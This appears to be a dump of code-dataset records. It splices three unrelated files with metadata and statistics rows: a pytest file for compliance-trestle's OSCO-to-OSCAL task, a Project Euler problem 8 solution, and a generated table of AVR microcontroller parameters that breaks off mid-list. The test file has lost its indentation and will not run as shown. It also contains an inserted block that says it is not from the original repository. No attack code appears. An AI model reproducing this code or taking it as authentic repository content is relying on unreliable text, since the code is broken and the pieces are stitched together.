aNebula/compliance-trestle
|
a2949e15b79bfc8ee13dd9822aa49e708548c62d
|
[
"Apache-2.0"
] | 1
|
2021-03-10T13:29:22.000Z
|
2021-03-10T13:29:22.000Z
|
tests/trestle/tasks/osco_to_oscal_test.py
|
aNebula/compliance-trestle
|
a2949e15b79bfc8ee13dd9822aa49e708548c62d
|
[
"Apache-2.0"
] | null | null | null |
tests/trestle/tasks/osco_to_oscal_test.py
|
aNebula/compliance-trestle
|
a2949e15b79bfc8ee13dd9822aa49e708548c62d
|
[
"Apache-2.0"
] | null | null | null |
# -*- mode:python; coding:utf-8 -*-
# Copyright (c) 2020 IBM Corp. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OSCO to OSCAL task tests."""
import configparser
import os
import pathlib
import uuid
from unittest.mock import Mock, patch
import trestle.tasks.osco_to_oscal as osco_to_oscal
from trestle.tasks.base_task import TaskOutcome
uuid_mock1 = Mock(return_value=uuid.UUID('56666738-0f9a-4e38-9aac-c0fad00a5821'))
uuid_mock2 = Mock(return_value=uuid.UUID('46aADFAC-A1fd-4Cf0-a6aA-d1AfAb3e0d3e'))
def test_print_info(tmpdir):
"""Test print_info call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.print_info()
assert retval is None
def test_simulate(tmpdir):
"""Test simulate call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_SUCCESS
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_compressed(tmpdir):
"""Test simulate call with compressed OSCO xml data."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-compressed.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_SUCCESS
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_no_config(tmpdir):
"""Test simulate no config call."""
tgt = osco_to_oscal.OscoToOscal(None)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_FAILURE
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_no_overwrite(tmpdir):
"""Test simulate no overwrite call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
section['output-overwrite'] = 'false'
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_FAILURE
assert len(os.listdir(str(tmpdir))) == 1
def test_simulate_no_input_dir(tmpdir):
"""Test simulate with no input dir call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
config.remove_option('task.osco-to-oscal', 'input-dir')
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_FAILURE
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_no_oscal_metadata_file(tmpdir):
"""Test simulate with no metadata file call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-no-oscal-metadata.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['input-metadata'] = 'non-existant.yaml'
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_SUCCESS
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_no_output_dir(tmpdir):
"""Test simulate with no output dir call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
config.remove_option('task.osco-to-oscal', 'output-dir')
section = config['task.osco-to-oscal']
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_FAILURE
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_input_fetcher(tmpdir):
"""Test simulate call OSCO fetcher json data."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-fetcher.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_SUCCESS
assert len(os.listdir(str(tmpdir))) == 0
@patch(target='uuid.uuid4', new=uuid_mock1)
def test_execute(tmpdir):
"""Test execute call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
f_expected = pathlib.Path('tests/data/tasks/osco/output/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
@patch(target='uuid.uuid4', new=uuid_mock1)
def test_execute_compressed(tmpdir):
"""Test execute call with compressed OSCO xml data."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-compressed.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
f_expected = pathlib.Path('tests/data/tasks/osco/output/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
def test_execute_no_config(tmpdir):
"""Test execute no config call."""
tgt = osco_to_oscal.OscoToOscal(None)
retval = tgt.execute()
assert retval == TaskOutcome.FAILURE
assert len(os.listdir(str(tmpdir))) == 0
def test_execute_no_overwrite(tmpdir):
"""Test execute no overwrite call."""
execute_no_overwrite_part1(tmpdir)
execute_no_overwrite_part2(tmpdir)
f_expected = pathlib.Path('tests/data/tasks/osco/output/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
@patch(target='uuid.uuid4', new=uuid_mock1)
def execute_no_overwrite_part1(tmpdir):
"""Create expected output."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
@patch(target='uuid.uuid4', new=uuid_mock2)
def execute_no_overwrite_part2(tmpdir):
"""Attempt to overwrite."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-overwrite'] = 'false'
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.FAILURE
def test_execute_no_input_dir(tmpdir):
"""Test execute with no input dir call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
config.remove_option('task.osco-to-oscal', 'input-dir')
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.FAILURE
assert len(os.listdir(str(tmpdir))) == 0
@patch(target='uuid.uuid4', new=uuid_mock2)
def test_execute_no_oscal_metadata_file(tmpdir):
"""Test execute with no metadata file call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-no-oscal-metadata.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['input-metadata'] = 'non-existant.yaml'
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
f_expected = pathlib.Path('tests/data/tasks/osco/output-no-oscal-metadata/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
def test_execute_no_output_dir(tmpdir):
"""Test execute with no output dir call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
config.remove_option('task.osco-to-oscal', 'output-dir')
section = config['task.osco-to-oscal']
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.FAILURE
assert len(os.listdir(str(tmpdir))) == 0
@patch(target='uuid.uuid4', new=uuid_mock1)
def test_execute_input_fetcher(tmpdir):
"""Test execute call OSCO fetcher json data."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-fetcher.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 2
f_expected = pathlib.Path('tests/data/tasks/osco/output-fetcher/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
f_expected = pathlib.Path('tests/data/tasks/osco/output-fetcher/') / 'ssg-ocp4-ds-cis-111.222.333.555-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.555-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
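# --- Hedged sketch (not from the original repository) -----------------------
# The tests above load configparser files from tests/data/tasks/osco/; this
# builds an equivalent in-memory section, using only the option names the
# tests touch (input-dir, input-metadata, output-dir, output-overwrite) with
# placeholder values.
import configparser
config = configparser.ConfigParser()
config['task.osco-to-oscal'] = {
    'input-dir': 'tests/data/tasks/osco/input',   # placeholder path
    'input-metadata': 'oscal-metadata.yaml',      # optional; several tests run without it
    'output-dir': '/tmp/osco-oscal-out',          # the tests override this with tmpdir
    'output-overwrite': 'true',                   # 'false' makes execute()/simulate() refuse to overwrite
}
section = config['task.osco-to-oscal']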
| 43.132353
| 125
| 0.708234
| 1,653
| 11,732
| 4.913491
| 0.101633
| 0.042847
| 0.078552
| 0.054174
| 0.852992
| 0.828244
| 0.811253
| 0.81113
| 0.805836
| 0.805836
| 0
| 0.023179
| 0.150528
| 11,732
| 271
| 126
| 43.291513
| 0.791792
| 0.109274
| 0
| 0.827907
| 0
| 0.009302
| 0.22233
| 0.153444
| 0
| 0
| 0
| 0
| 0.195349
| 1
| 0.088372
| false
| 0
| 0.032558
| 0
| 0.12093
| 0.009302
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
32261daacf218acb14e24363b9259887badbf398
| 1,640
|
py
|
Python
|
python/p008.py
|
lucaschen321/project-euler-solutions
|
721a1d6a82c082cc24197fec2500118848ee8433
|
[
"MIT"
] | null | null | null |
python/p008.py
|
lucaschen321/project-euler-solutions
|
721a1d6a82c082cc24197fec2500118848ee8433
|
[
"MIT"
] | null | null | null |
python/p008.py
|
lucaschen321/project-euler-solutions
|
721a1d6a82c082cc24197fec2500118848ee8433
|
[
"MIT"
] | null | null | null |
#
# Solution to Project Euler Problem 8
# by Lucas Chen
#
# Answer: 23514624000
#
DIGITS = 13
NUM = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
# Loops through each substring in [NUM] of length [DIGITS], and finds the
# substring whose [DIGITS] adjacent digits have the greatest product. Returns
# the value of this product.
def compute():
ans, product = 1, 1
for i in range(len(NUM) - DIGITS + 1): # loops through all substrings, including the final window
for j in range(DIGITS): # computes the digit product
product *= int(NUM[i+j])
if product > ans:
ans = product
product = 1
return ans
if __name__ == "__main__":
print(compute())
| 60.740741
| 1,008
| 0.854878
| 87
| 1,640
| 16.022989
| 0.597701
| 0.017217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.695622
| 0.108537
| 1,640
| 26
| 1,009
| 63.076923
| 0.257866
| 0.182927
| 0
| 0
| 0
| 0
| 0.759036
| 0.753012
| 0
| 1
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0
| 0
| 0.153846
| 0.076923
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c93ebd3810e581754093870d0105e6afe7ac76d
| 21,481
|
py
|
Python
|
devices.py
|
mvirkkunen/dwprog
|
c9458c4b8273e6bc8805a0a47b82fc185281c1b9
|
[
"MIT"
] | 14
|
2017-03-01T02:26:11.000Z
|
2021-06-08T21:45:39.000Z
|
devices.py
|
nerdralph/dwprog
|
468f703eb8b8ab335e3e45836fc77212214611cd
|
[
"MIT"
] | 4
|
2018-03-30T14:36:27.000Z
|
2018-04-21T04:03:54.000Z
|
devices.py
|
nerdralph/dwprog
|
468f703eb8b8ab335e3e45836fc77212214611cd
|
[
"MIT"
] | 2
|
2018-04-20T22:11:46.000Z
|
2018-08-23T03:31:05.000Z
|
# Generated with generatedevices.py
class Device:
def __init__(self, **kwargs):
for key in kwargs:
setattr(self, key, kwargs[key])
devices = [
Device(devid="at90can128", name="AT90CAN128", signature=0x978103f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90can32", name="AT90CAN32", signature=0x958103f, flash_size=0x8000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90can64", name="AT90CAN64", signature=0x968103f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm1", name="AT90PWM1", signature=0x9383, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm161", name="AT90PWM161", signature=0x948b, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm216", name="AT90PWM216", signature=0x9483, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm2b", name="AT90PWM2B", signature=0x9383, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm316", name="AT90PWM316", signature=0x9483, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm3b", name="AT90PWM3B", signature=0x9383, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm81", name="AT90PWM81", signature=0x9388, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb1286", name="AT90USB1286", signature=0x978203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb1287", name="AT90USB1287", signature=0x978203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb162", name="AT90USB162", signature=0x9482, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="at90usb646", name="AT90USB646", signature=0x968203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb647", name="AT90USB647", signature=0x968203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb82", name="AT90USB82", signature=0x9682, flash_size=0x2000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="atmega128", name="ATmega128", signature=0x970203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x48),
Device(devid="atmega1280", name="ATmega1280", signature=0x970303f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega1281", name="ATmega1281", signature=0x970403f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega1284", name="ATmega1284", signature=0x970503f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega1284p", name="ATmega1284P", signature=0x970503f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega1284rfr2", name="ATmega1284RFR2", signature=0xa70303f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega128a", name="ATmega128A", signature=0x970203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x48),
Device(devid="atmega128rfa1", name="ATmega128RFA1", signature=0xa70103f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega128rfr2", name="ATmega128RFR2", signature=0xa70203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16", name="ATmega16", signature=0x940303f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega162", name="ATmega162", signature=0x940403f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega164a", name="ATmega164A", signature=0x940a03f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega164p", name="ATmega164P", signature=0x940a03f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega164pa", name="ATmega164PA", signature=0x940a03f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega165a", name="ATmega165A", signature=0x940703f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega165p", name="ATmega165P", signature=0x940703f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega165pa", name="ATmega165PA", signature=0x940703f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168", name="ATmega168", signature=0x9406, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168a", name="ATmega168A", signature=0x940b, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168p", name="ATmega168P", signature=0x940b, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168pa", name="ATmega168PA", signature=0x940b, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168pb", name="ATmega168PB", signature=0x9415, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega169a", name="ATmega169A", signature=0x940503f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega169p", name="ATmega169P", signature=0x940503f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega169pa", name="ATmega169PA", signature=0x940503f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16a", name="ATmega16A", signature=0x940303f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16hva", name="ATmega16HVA", signature=0x940c, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16hvb", name="ATmega16HVB", signature=0x940d, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16hvbrevb", name="ATmega16HVBrevB", signature=0x940d, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16m1", name="ATmega16M1", signature=0x9484, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16u2", name="ATmega16U2", signature=0x9489, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="atmega16u4", name="ATmega16U4", signature=0x948803f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega2560", name="ATmega2560", signature=0x980103f, flash_size=0x40000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega2561", name="ATmega2561", signature=0x980203f, flash_size=0x40000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega2564rfr2", name="ATmega2564RFR2", signature=0xa80303f, flash_size=0x40000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega256rfr2", name="ATmega256RFR2", signature=0xa80203f, flash_size=0x40000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32", name="ATmega32", signature=0x950203f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega324a", name="ATmega324A", signature=0x951103f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega324p", name="ATmega324P", signature=0x950803f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega324pa", name="ATmega324PA", signature=0x951103f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega324pb", name="ATmega324PB", signature=0x951703f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega325", name="ATmega325", signature=0x950503f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3250", name="ATmega3250", signature=0x950603f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3250a", name="ATmega3250A", signature=0x950e03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3250p", name="ATmega3250P", signature=0x950e03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3250pa", name="ATmega3250PA", signature=0x950e03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega325a", name="ATmega325A", signature=0x950d03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega325p", name="ATmega325P", signature=0x950d03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega325pa", name="ATmega325PA", signature=0x950d03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega328", name="ATmega328", signature=0x950f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega328p", name="ATmega328P", signature=0x950f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega328pb", name="ATmega328PB", signature=0x9516, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega329", name="ATmega329", signature=0x950303f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3290", name="ATmega3290", signature=0x950403f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3290a", name="ATmega3290A", signature=0x950c03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3290p", name="ATmega3290P", signature=0x950c03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3290pa", name="ATmega3290PA", signature=0x950c03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega329a", name="ATmega329A", signature=0x950b03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega329p", name="ATmega329P", signature=0x950b03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega329pa", name="ATmega329PA", signature=0x950b03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32a", name="ATmega32A", signature=0x950203f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32c1", name="ATmega32C1", signature=0x9586, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32hvb", name="ATmega32HVB", signature=0x9510, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32hvbrevb", name="ATmega32HVBrevB", signature=0x9510, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32m1", name="ATmega32M1", signature=0x9584, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32u2", name="ATmega32U2", signature=0x958a, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="atmega32u4", name="ATmega32U4", signature=0x958703f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega406", name="ATmega406", signature=0x950703f, flash_size=0xa000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48", name="ATmega48", signature=0x9205, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48a", name="ATmega48A", signature=0x920a, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48p", name="ATmega48P", signature=0x920a, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48pa", name="ATmega48PA", signature=0x920a, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48pb", name="ATmega48PB", signature=0x9210, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64", name="ATmega64", signature=0x960203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x48),
